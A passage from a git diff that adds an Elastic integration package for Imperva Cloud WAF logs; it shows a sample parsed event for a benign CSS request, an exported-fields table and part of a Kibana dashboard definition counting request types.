"2024-01-31T09:22:42.456Z", + "agent": { + "ephemeral_id": "7d22d234-404b-426a-be1c-8ca128c3357b", + "id": "1c0e504b-c5db-46af-aa55-bd7efb79ed8c", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.10.1" + }, + "aws": { + "s3": { + "bucket": { + "arn": "arn:aws:s3:::elastic-package-imperva-cloud-waf-bucket-13510", + "name": "elastic-package-imperva-cloud-waf-bucket-13510" + }, + "object": { + "key": "events.log" + } + } + }, + "cloud": { + "region": "us-east-1" + }, + "data_stream": { + "dataset": "imperva_cloud_waf.event", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "1c0e504b-c5db-46af-aa55-bd7efb79ed8c", + "snapshot": false, + "version": "8.10.1" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "web" + ], + "code": "1", + "dataset": "imperva_cloud_waf.event", + "end": "2019-08-20T11:31:10.892Z", + "ingested": "2024-01-31T09:22:43Z", + "kind": "event", + "original": "CEF:0|Incapsula|SIEMintegration|1|1|Normal|0| sourceServiceName=site123.abcd.info siteid=1509732 suid=50005477 requestClientApplication=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 deviceFacility=mia ccode=IL tag=www.elvis.com cicode=Rehovot cs7=31.8969 cs7Label=latitude cs8=34.8186 cs8Label=longitude Customer=CEFcustomer123 siteTag=my-site-tag start=1453290121336 request=site123.abcd.info/main.css ref=www.incapsula.com/lama requestmethod=GET cn1=200 app=HTTP deviceExternalID=33411452762204224 in=54 xff=44.44.44.44 cpt=443 src=12.12.12.12 ver=TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 end=1566300670892 additionalReqHeaders=[{\"Accept\":\"*/*\"},{\"x-v\":\"1\"},{\"x-fapi-interaction-id\":\"10.10.10.10\"}] additionalResHeaders=[{\"Content-Type\":\"text/html; charset\\=UTF-8\"}]", + "severity": 0, + "start": "2016-01-20T11:42:01.336Z", + "type": [ + "info" + ] + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "status_code": 200 + } + }, + "imperva_cloud_waf": { + "event": { + "extensions": { + "additional": { + "req_headers": [ + { + "Accept": "*/*" + }, + { + "x-v": "1" + }, + { + "x-fapi-interaction-id": "10.10.10.10" + } + ], + "res_headers": [ + { + "Content-Type": "text/html; charset=UTF-8" + } + ] + }, + "cicode": "Rehovot", + "cs7Label": "latitude", + "cs8Label": "longitude", + "customer": "CEFcustomer123", + "device": { + "externalId": "33411452762204224", + "facility": "mia" + }, + "ref": "www.incapsula.com/lama", + "site": { + "id": "1509732", + "tag": "my-site-tag" + }, + "source": { + "service_name": "site123.abcd.info" + }, + "tag": "www.elvis.com", + "ver": "TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256" + }, + "name": "Normal", + "version": "0" + } + }, + "input": { + "type": "aws-s3" + }, + "log": { + "file": { + "path": "https://elastic-package-imperva-cloud-waf-bucket-13510.s3.us-east-1.amazonaws.com/events.log" + }, + "offset": 134 + }, + "message": "Normal", + "network": { + "application": "http", + "forwarded_ip": "44.44.44.44" + }, + "observer": { + "product": "SIEMintegration", + "vendor": "Incapsula", + "version": "1" + }, + "related": { + "ip": [ + "12.12.12.12", + "44.44.44.44" + ], + "user": [ + "50005477" + ] + }, + "source": { + "bytes": 54, + "geo": { + "country_iso_code": "IL", + "location": { + "lat": 31.8969, + "lon": 34.8186 + } + }, + "ip": "12.12.12.12", + "port": 443, + "service": { + "name": "site123.abcd.info" + }, + "user": { + "id": "50005477" + } + }, + "tags": [ + "collect_sqs_logs", + "preserve_original_event", + "forwarded", + "imperva_cloud_waf-event" + ], + "tls": { + "cipher": "ECDHE-RSA-AES128-GCM-SHA256", + "version": "1.2" + }, + "url": { + "extension": "css", + "original": "site123.abcd.info/main.css", + "path": "site123.abcd.info/main.css" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Firefox", + "original": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0", + "os": { + "full": "Windows 7", + "name": "Windows", + "version": "7" + }, + "version": "40.0." + } +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| aws.s3.bucket.arn | The AWS S3 bucket ARN. | keyword | +| aws.s3.bucket.name | The AWS S3 bucket name. | keyword | +| aws.s3.object.key | The AWS S3 Object key. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| destination.process.name | | keyword | +| event.dataset | Event dataset. | constant_keyword | +| event.module | Event module. | constant_keyword | +| imperva_cloud_waf.event.device.event_class_id | Signature Id. | keyword | +| imperva_cloud_waf.event.device.product | The product or service that is generating the logs. | keyword | +| imperva_cloud_waf.event.device.vendor | The vendor that is generating the logs. | keyword | +| imperva_cloud_waf.event.device.version | An integer that identifies the version of the log format. | keyword | +| imperva_cloud_waf.event.extensions.action | The method in which Imperva processed the request. | keyword | +| imperva_cloud_waf.event.extensions.additional.req_headers | Request headers in JSON format, with each field represented as a name-value pair. | object | +| imperva_cloud_waf.event.extensions.additional.res_headers | Response headers in JSON format, with each field represented as a name-value pair. | object | +| imperva_cloud_waf.event.extensions.application_protocol | The request protocol. | keyword | +| imperva_cloud_waf.event.extensions.bytes_in | The content length. | long | +| imperva_cloud_waf.event.extensions.ccode | The country code of the site visitor. | keyword | +| imperva_cloud_waf.event.extensions.cicode | The city code of the site visitor. | keyword | +| imperva_cloud_waf.event.extensions.cpt | The client port used to communicate the request. | long | +| imperva_cloud_waf.event.extensions.cs10 | JSON describing all actions that were applied to a specific request. | object | +| imperva_cloud_waf.event.extensions.cs10Label | | keyword | +| imperva_cloud_waf.event.extensions.cs11 | Additional information on the violation that triggered the rule, in JSON format. | object | +| imperva_cloud_waf.event.extensions.cs11Label | | keyword | +| imperva_cloud_waf.event.extensions.cs7 | The latitude of the event. | double | +| imperva_cloud_waf.event.extensions.cs7Label | | keyword | +| imperva_cloud_waf.event.extensions.cs8 | The longitude of the event. | double | +| imperva_cloud_waf.event.extensions.cs8Label | | keyword | +| imperva_cloud_waf.event.extensions.cs9 | The threat rule name that this request triggered. | keyword | +| imperva_cloud_waf.event.extensions.cs9Label | | keyword | +| imperva_cloud_waf.event.extensions.customer | The account name of the site owner. | keyword | +| imperva_cloud_waf.event.extensions.destination_process_name | The browser type. | keyword | +| imperva_cloud_waf.event.extensions.device.custom_number1 | The HTTP response code returned to the client. | long | +| imperva_cloud_waf.event.extensions.device.custom_string1 | Whether or not the client application supports Captcha. | keyword | +| imperva_cloud_waf.event.extensions.device.custom_string1_label | | keyword | +| imperva_cloud_waf.event.extensions.device.custom_string2 | Whether or not the client application supports JavaScript. | boolean | +| imperva_cloud_waf.event.extensions.device.custom_string2_label | | keyword | +| imperva_cloud_waf.event.extensions.device.custom_string3 | Whether or not the client application supports cookies. | boolean | +| imperva_cloud_waf.event.extensions.device.custom_string3_label | | keyword | +| imperva_cloud_waf.event.extensions.device.custom_string4 | The ID of the visitor. | keyword | +| imperva_cloud_waf.event.extensions.device.custom_string4_label | | keyword | +| imperva_cloud_waf.event.extensions.device.custom_string5 | For internal use. | keyword | +| imperva_cloud_waf.event.extensions.device.custom_string5_label | | keyword | +| imperva_cloud_waf.event.extensions.device.custom_string6 | The client application software. | keyword | +| imperva_cloud_waf.event.extensions.device.custom_string6_label | | keyword | +| imperva_cloud_waf.event.extensions.device.externalId | A unique identifier of the request that can be used to correlate with reports and data from the Imperva Cloud Security Console. | keyword | +| imperva_cloud_waf.event.extensions.device.facility | The Imperva PoP that handled the request. | keyword | +| imperva_cloud_waf.event.extensions.end_time | The end time of the response to the request, in UTC. In UNIX epoch time format. | date | +| imperva_cloud_waf.event.extensions.file.permission | Imperva attack id. | keyword | +| imperva_cloud_waf.event.extensions.file.type | The type of attack. | keyword | +| imperva_cloud_waf.event.extensions.file_id | The unique identification. | keyword | +| imperva_cloud_waf.event.extensions.postbody | The post body data of the request. | keyword | +| imperva_cloud_waf.event.extensions.qstr | The query string of the request. | keyword | +| imperva_cloud_waf.event.extensions.ref | The URL of the previous page that the client visited. | keyword | +| imperva_cloud_waf.event.extensions.request.client_application | The UserAgent header value. | keyword | +| imperva_cloud_waf.event.extensions.request.method | The request method. | keyword | +| imperva_cloud_waf.event.extensions.request.url | The URL of the request. | keyword | +| imperva_cloud_waf.event.extensions.sip | The IP address of the server. | ip | +| imperva_cloud_waf.event.extensions.site.id | The numeric identifier of the site. | keyword | +| imperva_cloud_waf.event.extensions.site.tag | Site level reference ID. | keyword | +| imperva_cloud_waf.event.extensions.source.address | The client IP that made the request. | ip | +| imperva_cloud_waf.event.extensions.source.port | The port of the server. | long | +| imperva_cloud_waf.event.extensions.source.service_name | The name of the site. | keyword | +| imperva_cloud_waf.event.extensions.source.user_id | The numeric identifier of the account of the site owner. | keyword | +| imperva_cloud_waf.event.extensions.start_time | The time in which this visit started, in UTC. In UNIX epoch time format. | date | +| imperva_cloud_waf.event.extensions.tag | Account level reference ID. | keyword | +| imperva_cloud_waf.event.extensions.ver | The TLS version and encryption algorithms used in the request. | keyword | +| imperva_cloud_waf.event.extensions.xff | The X-Forwarded-For request header. | ip | +| imperva_cloud_waf.event.name | The rule type that was triggered. | keyword | +| imperva_cloud_waf.event.severity | Imperva internal rule ID number. | long | +| imperva_cloud_waf.event.version | An integer that identifies the version of the log format. | keyword | +| input.type | Type of filebeat input. | keyword | +| log.offset | Log offset. | long | +| source.service.name | | keyword | +| tags | User defined tags. | keyword | + diff --git a/packages/imperva_cloud_waf/img/imperva-cwaf-dashboard.png b/packages/imperva_cloud_waf/img/imperva-cwaf-dashboard.png new file mode 100644 index 00000000000..422d7cbee94 Binary files /dev/null and b/packages/imperva_cloud_waf/img/imperva-cwaf-dashboard.png differ diff --git a/packages/imperva_cloud_waf/img/imperva-logo.svg b/packages/imperva_cloud_waf/img/imperva-logo.svg new file mode 100644 index 00000000000..5d71b569eed --- /dev/null +++ b/packages/imperva_cloud_waf/img/imperva-logo.svg @@ -0,0 +1,12 @@ + + + + + + + + + + + + diff --git a/packages/imperva_cloud_waf/kibana/dashboard/imperva_cloud_waf-6fbc3530-9a84-11ee-b689-05e9d8af2773.json b/packages/imperva_cloud_waf/kibana/dashboard/imperva_cloud_waf-6fbc3530-9a84-11ee-b689-05e9d8af2773.json new file mode 100644 index 00000000000..64685c26191 --- /dev/null +++ b/packages/imperva_cloud_waf/kibana/dashboard/imperva_cloud_waf-6fbc3530-9a84-11ee-b689-05e9d8af2773.json @@ -0,0 +1,3120 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"2dccd049-7bea-48b0-ab19-7ffbbcd453f1\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"2dccd049-7bea-48b0-ab19-7ffbbcd453f1\",\"fieldName\":\"source.service.name\",\"title\":\"Site Name\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"5bb7309d-d7d1-41f5-9326-604454396111\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"5bb7309d-d7d1-41f5-9326-604454396111\",\"fieldName\":\"imperva_cloud_waf.event.name\",\"title\":\"Rule Type\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"449e7daa-7a00-4195-8844-380171d6a2ab\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"449e7daa-7a00-4195-8844-380171d6a2ab\",\"fieldName\":\"event.action\",\"title\":\"Action\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}}}" + }, + "description": "Overview of the Events collected by the Imperva Cloud WAF.", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "\n#### Imperva Cloud WAF\n\n#### Overview\n\nThis dashboard visualizes security and access related events collected by Imperva Cloud WAF using the Event Data-stream. It provides metrics for total sites and different types of requests . It also provides an overview of events on the basis of browser type, http status code, request type, country code, action, attack type, client application, URL, User Agent and Source IP.\n\n[**Integration Page**](/app/integrations/detail/imperva_cloud_waf/overview)\n\n\n", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 33, + "i": "d03abee6-360a-48f0-b709-4bddaf103713", + "w": 10, + "x": 0, + "y": 0 + }, + "panelIndex": "d03abee6-360a-48f0-b709-4bddaf103713", + "title": "Table of Contents", + "type": "visualization", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-ee1f5d67-a0cd-4e67-a843-ac23283cf80a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6ded837a-330f-4592-b843-330781c144c3", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ee1f5d67-a0cd-4e67-a843-ac23283cf80a": { + "columnOrder": [ + "9c5b3fed-2412-4b93-bada-9b4d1c630de7" + ], + "columns": { + "9c5b3fed-2412-4b93-bada-9b4d1c630de7": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Sites", + "operationType": "unique_count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "source.service.name" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "6ded837a-330f-4592-b843-330781c144c3", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "ee1f5d67-a0cd-4e67-a843-ac23283cf80a", + "layerType": "data", + "metricAccessor": "9c5b3fed-2412-4b93-bada-9b4d1c630de7" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 18, + "i": "63fdf3c4-a96a-4994-9608-35a5d3ce5f45", + "w": 10, + "x": 10, + "y": 0 + }, + "panelIndex": "63fdf3c4-a96a-4994-9608-35a5d3ce5f45", + "title": "Total Sites", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2eb63a33-d0ba-432f-bbdb-fd39c3b36993", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ecfb37f1-2f60-4208-aeb7-0ae1b22579c1": { + "columnOrder": [ + "d8efdf0f-55db-4e33-bd77-2ff5e821bb77" + ], + "columns": { + "d8efdf0f-55db-4e33-bd77-2ff5e821bb77": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Requests", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "event.action" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "2eb63a33-d0ba-432f-bbdb-fd39c3b36993", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "layerType": "data", + "metricAccessor": "d8efdf0f-55db-4e33-bd77-2ff5e821bb77" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "c759b864-1c05-4f5a-8a24-321a796e94c8", + "w": 7, + "x": 20, + "y": 0 + }, + "panelIndex": "c759b864-1c05-4f5a-8a24-321a796e94c8", + "title": "Total Requests [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a34c0c84-35f7-485b-8aff-d9719375fa8e", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ecfb37f1-2f60-4208-aeb7-0ae1b22579c1": { + "columnOrder": [ + "d8efdf0f-55db-4e33-bd77-2ff5e821bb77" + ], + "columns": { + "d8efdf0f-55db-4e33-bd77-2ff5e821bb77": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Blocked Requests", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "event.action" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "a34c0c84-35f7-485b-8aff-d9719375fa8e", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "event.action : req-blocked-*" + }, + "visualization": { + "color": "#6092C0", + "layerId": "ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "layerType": "data", + "metricAccessor": "d8efdf0f-55db-4e33-bd77-2ff5e821bb77" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "69b4961d-b2e8-49aa-b57e-18089306b583", + "w": 7, + "x": 27, + "y": 0 + }, + "panelIndex": "69b4961d-b2e8-49aa-b57e-18089306b583", + "title": "Blocked Requests [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "0ff9081a-e1a6-4342-9a95-a9918fdbec33", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ecfb37f1-2f60-4208-aeb7-0ae1b22579c1": { + "columnOrder": [ + "d8efdf0f-55db-4e33-bd77-2ff5e821bb77" + ], + "columns": { + "d8efdf0f-55db-4e33-bd77-2ff5e821bb77": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Allowed Requests", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "event.action" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "0ff9081a-e1a6-4342-9a95-a9918fdbec33", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "event.action : \"req-passed\" " + }, + "visualization": { + "color": "#6092C0", + "layerId": "ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "layerType": "data", + "metricAccessor": "d8efdf0f-55db-4e33-bd77-2ff5e821bb77" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "a098b19a-9eeb-409e-8640-5067f86078c7", + "w": 7, + "x": 34, + "y": 0 + }, + "panelIndex": "a098b19a-9eeb-409e-8640-5067f86078c7", + "title": "Allowed Requests [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "53ec5e78-b51b-4288-870d-c159b172ed5a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ecfb37f1-2f60-4208-aeb7-0ae1b22579c1": { + "columnOrder": [ + "d8efdf0f-55db-4e33-bd77-2ff5e821bb77" + ], + "columns": { + "d8efdf0f-55db-4e33-bd77-2ff5e821bb77": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Bad Requests", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "event.action" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "53ec5e78-b51b-4288-870d-c159b172ed5a", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "event.action : req-bad-*" + }, + "visualization": { + "color": "#6092C0", + "layerId": "ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "layerType": "data", + "metricAccessor": "d8efdf0f-55db-4e33-bd77-2ff5e821bb77" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "2ce9ebd8-844a-46ad-8814-b6c022a53559", + "w": 7, + "x": 41, + "y": 0 + }, + "panelIndex": "2ce9ebd8-844a-46ad-8814-b6c022a53559", + "title": "Bad Requests [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9fb6f4c0-fb84-4502-9d1b-4adea470522a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ecfb37f1-2f60-4208-aeb7-0ae1b22579c1": { + "columnOrder": [ + "d8efdf0f-55db-4e33-bd77-2ff5e821bb77" + ], + "columns": { + "d8efdf0f-55db-4e33-bd77-2ff5e821bb77": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Challenged Requests", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "event.action" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "9fb6f4c0-fb84-4502-9d1b-4adea470522a", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "event.action : req-challenge-*" + }, + "visualization": { + "color": "#6092C0", + "layerId": "ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "layerType": "data", + "metricAccessor": "d8efdf0f-55db-4e33-bd77-2ff5e821bb77" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "486bf205-e29b-4c19-9f3f-4ff5eabb8b1e", + "w": 7, + "x": 20, + "y": 9 + }, + "panelIndex": "486bf205-e29b-4c19-9f3f-4ff5eabb8b1e", + "title": "Challenged Requests [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "eb938c68-c896-407a-ab56-2305f6b23b58", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ecfb37f1-2f60-4208-aeb7-0ae1b22579c1": { + "columnOrder": [ + "d8efdf0f-55db-4e33-bd77-2ff5e821bb77" + ], + "columns": { + "d8efdf0f-55db-4e33-bd77-2ff5e821bb77": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Cached Requests", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "event.action" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "eb938c68-c896-407a-ab56-2305f6b23b58", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "event.action : req-cached-*" + }, + "visualization": { + "color": "#6092C0", + "layerId": "ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "layerType": "data", + "metricAccessor": "d8efdf0f-55db-4e33-bd77-2ff5e821bb77" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "ec9fc3cf-977e-4cde-bf7b-0f6ba27ae186", + "w": 7, + "x": 27, + "y": 9 + }, + "panelIndex": "ec9fc3cf-977e-4cde-bf7b-0f6ba27ae186", + "title": "Cached Requests [Logs Imperva Cloud WAF]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-abd9e58c-abec-44f0-9d95-3768df9b8930", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "43a42766-7342-4885-b71a-519aafe116cc", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "abd9e58c-abec-44f0-9d95-3768df9b8930": { + "columnOrder": [ + "eed0424d-6de8-4527-a2d6-fd4bfe72ac10" + ], + "columns": { + "eed0424d-6de8-4527-a2d6-fd4bfe72ac10": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique IP Addresses", + "operationType": "unique_count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "source.ip" + } + }, + "incompleteColumns": {} + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "43a42766-7342-4885-b71a-519aafe116cc", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": 